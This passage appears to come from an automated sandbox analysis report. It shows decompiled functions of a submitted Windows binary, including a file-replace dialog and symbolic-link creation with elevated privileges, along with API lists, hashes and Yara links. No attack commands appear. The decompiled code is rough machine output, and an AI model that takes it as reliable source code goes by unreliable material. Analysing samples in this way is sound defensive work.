                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                            • String ID:
                            • API String ID: 1269201914-0
                            • Opcode ID: 662be9704620c952e5bf96c00399d1a5404c0ad432582b4ab70aacc820d113d2
                            • Instruction ID: 7777f4bc8e56642fc2284c86895481d2d8d38f2adbb49b0d1a4e98a0c2f1e2e2
                            • Opcode Fuzzy Hash: 662be9704620c952e5bf96c00399d1a5404c0ad432582b4ab70aacc820d113d2
                            • Instruction Fuzzy Hash: 2BA012C519F005BC300411806C06D76030FD4D0B243308D09F1118004454444D400171
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FD225, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                            Download Yara Rule
                            C-Code - Quality: 22%
                            			E009FD225() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa1ab8c); // executed
				E009FD53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                            0x009fd212
                            0x009fd217
                            0x009fd21e

                            APIs
                            • ___delayLoadHelper2@8.DELAYIMP ref: 009FD217
                              • Part of subcall function 009FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FD5B7
                              • Part of subcall function 009FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FD5C8
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                            • String ID:
                            • API String ID: 1269201914-0
                            • Opcode ID: 59687a85cdba7b5f071a615fd0f2c42201f62158b4b46adef2258c9e3c0620e7
                            • Instruction ID: 7777f4bc8e56642fc2284c86895481d2d8d38f2adbb49b0d1a4e98a0c2f1e2e2
                            • Opcode Fuzzy Hash: 59687a85cdba7b5f071a615fd0f2c42201f62158b4b46adef2258c9e3c0620e7
                            • Instruction Fuzzy Hash: 2BA012C519F005BC300411806C06D76030FD4D0B243308D09F1118004454444D400171
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E9BD6, Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E009E9BD6(void* __ecx) {
				int _t2;

				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
				asm("sbb eax, eax");
				return  ~(_t2 - 1) + 1;
			}




                            0x009e9bd9
                            0x009e9be2
                            0x009e9be5

                            APIs
                            • SetEndOfFile.KERNELBASE(?,009E8F33,?,?,-00001960), ref: 009E9BD9
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: File
                            • String ID:
                            • API String ID: 749574446-0
                            • Opcode ID: dd5d625643b325045059bd1aad2eda6ff86e521be2de0ae978c3f04290126983
                            • Instruction ID: fdeca64f39226edc92217a62d36032f0bbee5e35415b6f1d9a46f03ecd66d2c8
                            • Opcode Fuzzy Hash: dd5d625643b325045059bd1aad2eda6ff86e521be2de0ae978c3f04290126983
                            • Instruction Fuzzy Hash: 51B011300A000A8A8E00AB30CC08A283A22EA2A30A30082A0A002CA0A0CB22C823AB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F9A8D, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E009F9A8D(WCHAR* _a4) {
				signed int _t2;

				_t2 = SetCurrentDirectoryW(_a4); // executed
				asm("sbb eax, eax");
				return  ~( ~_t2);
			}




                            0x009f9a91
                            0x009f9a99
                            0x009f9a9d

                            APIs
                            • SetCurrentDirectoryW.KERNELBASE(?,009F9CE4,C:\Users\user\Desktop,00000000,00A285FA,00000006), ref: 009F9A91
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CurrentDirectory
                            • String ID:
                            • API String ID: 1611563598-0
                            • Opcode ID: b01f1f80661966b48f7e727b8753f69d7a82f1cbe4d40d469dc89a1a1d8fe411
                            • Instruction ID: 2af04f94b8cc2bf897febb6bcba2f2112b79a7ba9c3cdc19563c766dfd779cae
                            • Opcode Fuzzy Hash: b01f1f80661966b48f7e727b8753f69d7a82f1cbe4d40d469dc89a1a1d8fe411
                            • Instruction Fuzzy Hash: 7AA01230194006568A108B30CC09C1576515760702F00C7207102C00A0CB30C820A604
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 009FAFB9, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 289timewindowfileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 60%
                            			E009FAFB9(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
				struct _FILETIME _v0;
				struct _SYSTEMTIME _v12;
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				void* _t73;
				void* _t136;
				long _t137;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				signed short _t148;
				void* _t151;
				intOrPtr _t152;
				signed int _t153;
				signed int _t157;
				struct HWND__* _t159;
				intOrPtr _t162;
				void* _t163;
				int _t166;
				int _t169;
				void* _t173;
				void* _t177;
				void* _t179;

				_t156 = __edx;
				_t151 = __ecx;
				E009FD940();
				_t148 = _a6748;
				_t162 = _a6744;
				_t159 = _a6740;
				if(E009E12D7(__edx, _t159, _t162, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
					_t163 = _t162 - 0x110;
					if(_t163 == 0) {
						SetFocus(GetDlgItem(_t159, 0x6c));
						E009EFAB1( &_a2640, _a6752, 0x800);
						E009EBA19( &_a2628,  &_a2628, 0x800);
						SetDlgItemTextW(_t159, 0x65,  &_a2616);
						 *0xa1df00( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
						SendDlgItemMessageW(_t159, 0x66, 0x170, _a1904, 0);
						_t173 = FindFirstFileW( &_a2596,  &_a288);
						if(_t173 != 0xffffffff) {
							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
							_push(0x32);
							_push( &_a12);
							_push(0);
							_push( &_v12);
							_t166 = 2;
							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
							_push( &_a12);
							_push( &_a112);
							E009E3E41( &_a900, 0x200, L"%s %s %s", E009EDA42(_t151, 0x99));
							_t179 = _t177 + 0x18;
							SetDlgItemTextW(_t159, 0x6a,  &_a900);
							FindClose(_t173);
							if((_a308 & 0x00000010) == 0) {
								_push(0x32);
								_push( &_a212);
								_push(0);
								_pop(0);
								asm("adc eax, ebp");
								_push(_a340);
								_push(0 + _a344);
								E009F9D99();
								_push(E009EDA42(0 + _a344, 0x98));
								E009E3E41( &_a884, 0x200, L"%s %s",  &_a192);
								_t179 = _t179 + 0x14;
								SetDlgItemTextW(_t159, 0x68,  &_a884);
							}
							SendDlgItemMessageW(_t159, 0x67, 0x170, _a1928, 0);
							_t152 =  *0xa275f4; // 0x0
							E009F082F(_t152, _t156,  &_a4);
							FileTimeToLocalFileTime( &_v0,  &_v24);
							FileTimeToSystemTime( &_v24,  &_v16);
							GetTimeFormatW(0x400, _t166,  &_v16, 0,  &_a8, 0x32);
							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
							_push( &_a8);
							_push( &_a108);
							E009E3E41( &_a896, 0x200, L"%s %s %s", E009EDA42(_t152, 0x99));
							_t177 = _t179 + 0x18;
							SetDlgItemTextW(_t159, 0x6b,  &_a896);
							_t153 =  *0xa3ce14;
							_t157 =  *0xa3ce10;
							if((_a304 & 0x00000010) == 0 || (_t157 | _t153) != 0) {
								E009F9D99(_t157, _t153,  &_a212, 0x32);
								_push(E009EDA42(_t153, 0x98));
								E009E3E41( &_a884, 0x200, L"%s %s",  &_a192);
								_t177 = _t177 + 0x14;
								SetDlgItemTextW(_t159, 0x69,  &_a884);
							}
						}
						L27:
						_t73 = 0;
						L28:
						return _t73;
					}
					if(_t163 != 1) {
						goto L27;
					}
					_t169 = 2;
					_t136 = (_t148 & 0x0000ffff) - _t169;
					if(_t136 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t169);
						L13:
						_t137 = SendDlgItemMessageW(_t159, 0x66, 0x171, 0, 0);
						if(_t137 != 0) {
							 *0xa1df4c(_t137);
						}
						EndDialog(_t159, _t169);
						goto L1;
					}
					_t141 = _t136 - 0x6a;
					if(_t141 == 0) {
						_t169 = 0;
						goto L13;
					}
					_t142 = _t141 - 1;
					if(_t142 == 0) {
						_t169 = 1;
						goto L13;
					}
					_t143 = _t142 - 1;
					if(_t143 == 0) {
						_push(4);
						goto L12;
					}
					_t144 = _t143 - 1;
					if(_t144 == 0) {
						goto L13;
					}
					_t145 = _t144 - 1;
					if(_t145 == 0) {
						_push(3);
						goto L12;
					}
					if(_t145 != 1) {
						goto L27;
					}
					goto L11;
				}
				L1:
				_t73 = 1;
				goto L28;
			}




























                            0x009fafb9
                            0x009fafb9
                            0x009fafbe
                            0x009fafc4
                            0x009fafcd
                            0x009fafd7
                            0x009faff6
                            0x009fb000
                            0x009fb006
                            0x009fb080
                            0x009fb09b
                            0x009fb0aa
                            0x009fb0c0
                            0x009fb0dd
                            0x009fb0f3
                            0x009fb10f
                            0x009fb114
                            0x009fb127
                            0x009fb137
                            0x009fb13d
                            0x009fb143
                            0x009fb144
                            0x009fb14a
                            0x009fb14d
                            0x009fb154
                            0x009fb172
                            0x009fb17c
                            0x009fb184
                            0x009fb1a2
                            0x009fb1a7
                            0x009fb1b5
                            0x009fb1b8
                            0x009fb1c6
                            0x009fb1c8
                            0x009fb1da
                            0x009fb1e2
                            0x009fb1e4
                            0x009fb1e5
                            0x009fb1e7
                            0x009fb1e8
                            0x009fb1e9
                            0x009fb1f8
                            0x009fb213
                            0x009fb218
                            0x009fb226
                            0x009fb226
                            0x009fb23c
                            0x009fb242
                            0x009fb24d
                            0x009fb25c
                            0x009fb26c
                            0x009fb286
                            0x009fb29e
                            0x009fb2a8
                            0x009fb2b0
                            0x009fb2cf
                            0x009fb2d4
                            0x009fb2e2
                            0x009fb2ec
                            0x009fb2f2
                            0x009fb2f8
                            0x009fb30c
                            0x009fb31b
                            0x009fb332
                            0x009fb337
                            0x009fb345
                            0x009fb345
                            0x009fb2f8
                            0x009fb347
                            0x009fb347
                            0x009fb349
                            0x009fb353
                            0x009fb353
                            0x009fb00b
                            0x00000000
                            0x00000000
                            0x009fb016
                            0x009fb017
                            0x009fb019
                            0x009fb03d
                            0x009fb03d
                            0x009fb03f
                            0x009fb03f
                            0x009fb040
                            0x009fb04a
                            0x009fb052
                            0x009fb055
                            0x009fb055
                            0x009fb05d
                            0x00000000
                            0x009fb05d
                            0x009fb01b
                            0x009fb01e
                            0x009fb072
                            0x00000000
                            0x009fb072
                            0x009fb020
                            0x009fb023
                            0x009fb06f
                            0x00000000
                            0x009fb06f
                            0x009fb025
                            0x009fb028
                            0x009fb069
                            0x00000000
                            0x009fb069
                            0x009fb02a
                            0x009fb02d
                            0x00000000
                            0x00000000
                            0x009fb02f
                            0x009fb032
                            0x009fb065
                            0x00000000
                            0x009fb065
                            0x009fb037
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009fb037
                            0x009faff8
                            0x009faffa
                            0x00000000

                            APIs
                              • Part of subcall function 009E12D7: GetDlgItem.USER32(00000000,00003021), ref: 009E131B
                              • Part of subcall function 009E12D7: SetWindowTextW.USER32(00000000,00A122E4), ref: 009E1331
                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 009FB04A
                            • EndDialog.USER32(?,00000006), ref: 009FB05D
                            • GetDlgItem.USER32(?,0000006C), ref: 009FB079
                            • SetFocus.USER32(00000000), ref: 009FB080
                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 009FB0C0
                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 009FB0F3
                            • FindFirstFileW.KERNEL32(?,?), ref: 009FB109
                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009FB127
                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 009FB137
                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 009FB154
                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 009FB172
                            • _swprintf.LIBCMT ref: 009FB1A2
                              • Part of subcall function 009E3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009E3E54
                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 009FB1B5
                            • FindClose.KERNEL32(00000000), ref: 009FB1B8
                            • _swprintf.LIBCMT ref: 009FB213
                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 009FB226
                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 009FB23C
                            • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 009FB25C
                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 009FB26C
                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 009FB286
                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 009FB29E
                            • _swprintf.LIBCMT ref: 009FB2CF
                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 009FB2E2
                            • _swprintf.LIBCMT ref: 009FB332
                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 009FB345
                              • Part of subcall function 009F9D99: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 009F9DBF
                              • Part of subcall function 009F9D99: GetNumberFormatW.KERNEL32 ref: 009F9E0E
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                            • API String ID: 797121971-1840816070
                            • Opcode ID: 90b46e5a8f2c4d2a9dea800e286011a713d1bd330b8c0e2b0f8728da6e882da2
                            • Instruction ID: 5f8b40309d1e779464b023fce9f425c3d1ab238ec778104cc04dfccd18f39869
                            • Opcode Fuzzy Hash: 90b46e5a8f2c4d2a9dea800e286011a713d1bd330b8c0e2b0f8728da6e882da2
                            • Instruction Fuzzy Hash: E091A172248348BBE631DFA0CD49FFB77ACEB89704F044919B749D6081EB75EA058762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E6FC6, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 299fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 83%
                            			E009E6FC6(void* __edx) {
				void* __esi;
				signed int _t111;
				signed int _t113;
				void* _t116;
				int _t118;
				intOrPtr _t121;
				signed int _t139;
				int _t145;
				void* _t182;
				void* _t185;
				void* _t190;
				short _t191;
				void* _t197;
				void* _t202;
				void* _t203;
				void* _t222;
				void* _t223;
				intOrPtr _t224;
				intOrPtr _t226;
				void* _t228;
				WCHAR* _t229;
				intOrPtr _t233;
				short _t237;
				void* _t238;
				intOrPtr _t239;
				short _t241;
				void* _t242;
				void* _t244;
				void* _t245;

				_t223 = __edx;
				E009FD870(E00A1126D, _t242);
				E009FD940();
				 *((intOrPtr*)(_t242 - 0x18)) = 1;
				if( *0xa20043 == 0) {
					E009E7A15(L"SeRestorePrivilege");
					E009E7A15(L"SeCreateSymbolicLinkPrivilege");
					 *0xa20043 = 1;
				}
				_t199 = _t242 - 0x2c;
				E009E6ED7(_t242 - 0x2c, 0x1418);
				_t197 =  *(_t242 + 0x10);
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				E009EFAB1(_t242 - 0x107c, _t197 + 0x1104, 0x800);
				 *((intOrPtr*)(_t242 - 0x10)) = E00A02B33(_t242 - 0x107c);
				_t232 = _t242 - 0x107c;
				_t228 = _t242 - 0x207c;
				_t111 = E00A04DA0(_t242 - 0x107c, L"\\??\\", 4);
				_t245 = _t244 + 0x10;
				asm("sbb al, al");
				_t113 =  ~_t111 + 1;
				 *(_t242 - 0x14) = _t113;
				if(_t113 != 0) {
					_t232 = _t242 - 0x1074;
					_t190 = E00A04DA0(_t242 - 0x1074, L"UNC\\", 4);
					_t245 = _t245 + 0xc;
					if(_t190 == 0) {
						_t191 = 0x5c;
						 *((short*)(_t242 - 0x207c)) = _t191;
						_t228 = _t242 - 0x207a;
						_t232 = _t242 - 0x106e;
					}
				}
				E00A04D7E(_t228, _t232);
				_t116 = E00A02B33(_t242 - 0x207c);
				_t233 =  *((intOrPtr*)(_t242 + 8));
				_t229 =  *(_t242 + 0xc);
				 *(_t242 + 0x10) = _t116;
				if( *((char*)(_t233 + 0x618f)) != 0) {
					L9:
					_push(1);
					_push(_t229);
					E009E9D3A(_t199, _t242);
					if( *((char*)(_t197 + 0x10f1)) != 0 ||  *((char*)(_t197 + 0x2104)) != 0) {
						_t118 = CreateDirectoryW(_t229, 0);
						__eflags = _t118;
						if(_t118 == 0) {
							goto L27;
						}
						goto L14;
					} else {
						_t182 = CreateFileW(_t229, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t182 == 0xffffffff) {
							L27:
							 *((char*)(_t242 - 0x18)) = 0;
							L28:
							E009E159C(_t242 - 0x2c);
							 *[fs:0x0] =  *((intOrPtr*)(_t242 - 0xc));
							return  *((intOrPtr*)(_t242 - 0x18));
						}
						CloseHandle(_t182);
						L14:
						_t121 =  *((intOrPtr*)(_t197 + 0x1100));
						if(_t121 != 3) {
							__eflags = _t121 - 2;
							if(_t121 == 2) {
								L18:
								_t202 =  *(_t242 - 0x2c);
								_t224 =  *((intOrPtr*)(_t242 - 0x10));
								 *_t202 = 0xa000000c;
								_t237 = _t224 + _t224;
								 *((short*)(_t202 + 0xa)) = _t237;
								 *((short*)(_t202 + 4)) = 0x10 + ( *(_t242 + 0x10) + _t224) * 2;
								 *((intOrPtr*)(_t202 + 6)) = 0;
								E00A04D7E(_t202 + 0x14, _t242 - 0x107c);
								_t60 = _t237 + 2; // 0x3
								_t238 =  *(_t242 - 0x2c);
								 *((short*)(_t238 + 0xc)) = _t60;
								 *((short*)(_t238 + 0xe)) =  *(_t242 + 0x10) +  *(_t242 + 0x10);
								E00A04D7E(_t238 + ( *((intOrPtr*)(_t242 - 0x10)) + 0xb) * 2, _t242 - 0x207c);
								_t139 =  *(_t242 - 0x14) & 0x000000ff ^ 0x00000001;
								__eflags = _t139;
								 *(_t238 + 0x10) = _t139;
								L19:
								_t203 = CreateFileW(_t229, 0xc0000000, 0, 0, 3, 0x2200000, 0);
								 *(_t242 + 0x10) = _t203;
								if(_t203 == 0xffffffff) {
									goto L27;
								}
								_t145 = DeviceIoControl(_t203, 0x900a4, _t238, ( *(_t238 + 4) & 0x0000ffff) + 8, 0, 0, _t242 - 0x30, 0);
								_t262 = _t145;
								if(_t145 != 0) {
									E009E943C(_t242 - 0x30a0);
									 *(_t242 - 4) = 1;
									 *((intOrPtr*)( *((intOrPtr*)(_t242 - 0x30a0)) + 8))();
									_t239 =  *((intOrPtr*)(_t242 + 8));
									 *(_t242 - 0x309c) =  *(_t242 + 0x10);
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									E009E9A7E(_t242 - 0x30a0, _t239,  ~( *(_t239 + 0x72c8)) & _t197 + 0x00001040,  ~( *(_t239 + 0x72cc)) & _t197 + 0x00001048,  ~( *(_t239 + 0x72d0)) & _t197 + 0x00001050);
									E009E94DA(_t242 - 0x30a0);
									__eflags =  *((char*)(_t239 + 0x61a0));
									if( *((char*)(_t239 + 0x61a0)) == 0) {
										E009EA12F(_t229,  *((intOrPtr*)(_t197 + 0x24)));
									}
									E009E946E(_t242 - 0x30a0);
									goto L28;
								}
								CloseHandle( *(_t242 + 0x10));
								E009E6BF5(_t262, 0x15, 0, _t229);
								_t160 = GetLastError();
								if(_t160 == 5 || _t160 == 0x522) {
									if(E009EFC98() == 0) {
										E009E1567(_t242 - 0x7c, 0x18);
										_t160 = E009F0A9F(_t242 - 0x7c);
									}
								}
								E009FE214(_t160);
								E009E6E03(0xa200e0, 9);
								_push(_t229);
								if( *((char*)(_t197 + 0x10f1)) == 0) {
									DeleteFileW();
								} else {
									RemoveDirectoryW();
								}
								goto L27;
							}
							__eflags = _t121 - 1;
							if(_t121 != 1) {
								goto L27;
							}
							goto L18;
						}
						_t222 =  *(_t242 - 0x2c);
						_t226 =  *((intOrPtr*)(_t242 - 0x10));
						 *_t222 = 0xa0000003;
						_t241 = _t226 + _t226;
						 *((short*)(_t222 + 0xa)) = _t241;
						 *((short*)(_t222 + 4)) = 0xc + ( *(_t242 + 0x10) + _t226) * 2;
						 *((intOrPtr*)(_t222 + 6)) = 0;
						E00A04D7E(_t222 + 0x10, _t242 - 0x107c);
						_t40 = _t241 + 2; // 0x3
						_t238 =  *(_t242 - 0x2c);
						 *((short*)(_t238 + 0xc)) = _t40;
						 *((short*)(_t238 + 0xe)) =  *(_t242 + 0x10) +  *(_t242 + 0x10);
						E00A04D7E(_t238 + ( *((intOrPtr*)(_t242 - 0x10)) + 9) * 2, _t242 - 0x207c);
						goto L19;
					}
				}
				if( *(_t242 - 0x14) != 0) {
					goto L27;
				}
				_t185 = E009EB4F2(_t197 + 0x1104);
				_t255 = _t185;
				if(_t185 != 0) {
					goto L27;
				}
				_push(_t197 + 0x1104);
				_push(_t229);
				_push(_t197 + 0x28);
				_push(_t233);
				if(E009E77F7(_t223, _t255) == 0) {
					goto L27;
				}
				goto L9;
			}
































                            0x009e6fc6
                            0x009e6fcb
                            0x009e6fd5
                            0x009e6fe7
                            0x009e6fea
                            0x009e6ff1
                            0x009e6ffb
                            0x009e7000
                            0x009e7000
                            0x009e700b
                            0x009e700e
                            0x009e7013
                            0x009e7016
                            0x009e702d
                            0x009e7040
                            0x009e7043
                            0x009e704b
                            0x009e7057
                            0x009e705c
                            0x009e7061
                            0x009e7063
                            0x009e7065
                            0x009e706a
                            0x009e706e
                            0x009e707c
                            0x009e7081
                            0x009e7086
                            0x009e708a
                            0x009e708b
                            0x009e7092
                            0x009e7098
                            0x009e7098
                            0x009e7086
                            0x009e70a0
                            0x009e70ac
                            0x009e70b1
                            0x009e70b7
                            0x009e70ba
                            0x009e70c4
                            0x009e70fe
                            0x009e7101
                            0x009e7102
                            0x009e7103
                            0x009e710f
                            0x009e7146
                            0x009e714c
                            0x009e714e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e711a
                            0x009e712b
                            0x009e7134
                            0x009e72f4
                            0x009e72f4
                            0x009e72f8
                            0x009e72fb
                            0x009e7309
                            0x009e7313
                            0x009e7313
                            0x009e713b
                            0x009e7154
                            0x009e7154
                            0x009e715d
                            0x009e71c5
                            0x009e71c8
                            0x009e71d2
                            0x009e71d2
                            0x009e71d5
                            0x009e71dd
                            0x009e71e3
                            0x009e71e6
                            0x009e71f1
                            0x009e71f7
                            0x009e7205
                            0x009e720a
                            0x009e720d
                            0x009e7210
                            0x009e7219
                            0x009e722e
                            0x009e723c
                            0x009e723c
                            0x009e723f
                            0x009e7242
                            0x009e725a
                            0x009e725c
                            0x009e7262
                            0x00000000
                            0x00000000
                            0x009e7280
                            0x009e7286
                            0x009e7288
                            0x009e7324
                            0x009e7335
                            0x009e7339
                            0x009e733c
                            0x009e7342
                            0x009e7356
                            0x009e7369
                            0x009e737c
                            0x009e7387
                            0x009e7392
                            0x009e7397
                            0x009e739e
                            0x009e73a4
                            0x009e73a4
                            0x009e73af
                            0x00000000
                            0x009e73af
                            0x009e7292
                            0x009e729d
                            0x009e72a2
                            0x009e72ab
                            0x009e72bb
                            0x009e72c2
                            0x009e72ca
                            0x009e72ca
                            0x009e72bb
                            0x009e72d6
                            0x009e72df
                            0x009e72eb
                            0x009e72ec
                            0x009e7316
                            0x009e72ee
                            0x009e72ee
                            0x009e72ee
                            0x00000000
                            0x009e72ec
                            0x009e71ca
                            0x009e71cc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e71cc
                            0x009e715f
                            0x009e7162
                            0x009e716a
                            0x009e7170
                            0x009e7173
                            0x009e717e
                            0x009e7184
                            0x009e7192
                            0x009e7197
                            0x009e719a
                            0x009e719d
                            0x009e71a6
                            0x009e71bb
                            0x00000000
                            0x009e71c0
                            0x009e710f
                            0x009e70ca
                            0x00000000
                            0x00000000
                            0x009e70d7
                            0x009e70dc
                            0x009e70de
                            0x00000000
                            0x00000000
                            0x009e70ea
                            0x009e70eb
                            0x009e70ef
                            0x009e70f0
                            0x009e70f8
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            • __EH_prolog.LIBCMT ref: 009E6FCB
                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 009E712B
                            • CloseHandle.KERNEL32(00000000), ref: 009E713B
                              • Part of subcall function 009E7A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 009E7A24
                              • Part of subcall function 009E7A15: GetLastError.KERNEL32 ref: 009E7A6A
                              • Part of subcall function 009E7A15: CloseHandle.KERNEL32(?), ref: 009E7A79
                            • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 009E7146
                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 009E7254
                            • DeviceIoControl.KERNEL32 ref: 009E7280
                            • CloseHandle.KERNEL32(?), ref: 009E7292
                            • GetLastError.KERNEL32(00000015,00000000,?), ref: 009E72A2
                            • RemoveDirectoryW.KERNEL32(?), ref: 009E72EE
                            • DeleteFileW.KERNEL32(?), ref: 009E7316
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                            • API String ID: 3935142422-3508440684
                            • Opcode ID: 2dac9ad90cc18d9c953dcdd524bfd01a5e3761cf46bba15c46620e6a42f165e3
                            • Instruction ID: 27b8c28fb2394e221ebf1f11879e79e49faf94dabe1dbffb41a55e3088fecb81
